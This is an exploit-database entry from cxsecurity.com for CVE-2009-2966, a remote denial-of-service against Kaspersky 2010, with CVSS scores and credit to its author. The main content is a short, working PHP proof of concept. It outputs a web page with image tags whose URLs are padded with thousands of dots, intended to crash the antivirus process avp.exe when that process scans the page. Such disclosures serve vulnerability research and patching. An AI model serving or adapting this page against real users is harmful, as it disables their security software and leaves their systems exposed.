Kaspersky 2010 remote dos (php)

Published
Credit
Risk
2009.08.21
Maksymilian Arciemowicz
High
CWE
CVE
Local
Remote
CWE-399
CVE-2009-2966
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
None
None
Partial

<?php
echo "<html><head><title>Kaspersky 2010 remote dos</title></head><body>
<img src=\"http://cxsecurity.com/gfx/logo.gif?explkasp\"><br>
Kaspersky 11.08.2009 02:44 CET<br>
remote denial of service<br>
check your avp.exe<br>
by Maksymilian Arciemowicz <a href=\"http://cxsecurity.com/\" alt=\"security audit\"><b>cxsecurity.com</b></a><p>";
flush();

for($num=9000; 499<$num; $num -= 500)
echo "<img src=\"http://lu.cxib.net/".str_repeat(".",$num)."\">\n";

echo "<! some systems have different acceptable max path len? !>
</body>
</html>";
?>

References:

http://cxsecurity.com/issue/WLB-2009080044


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com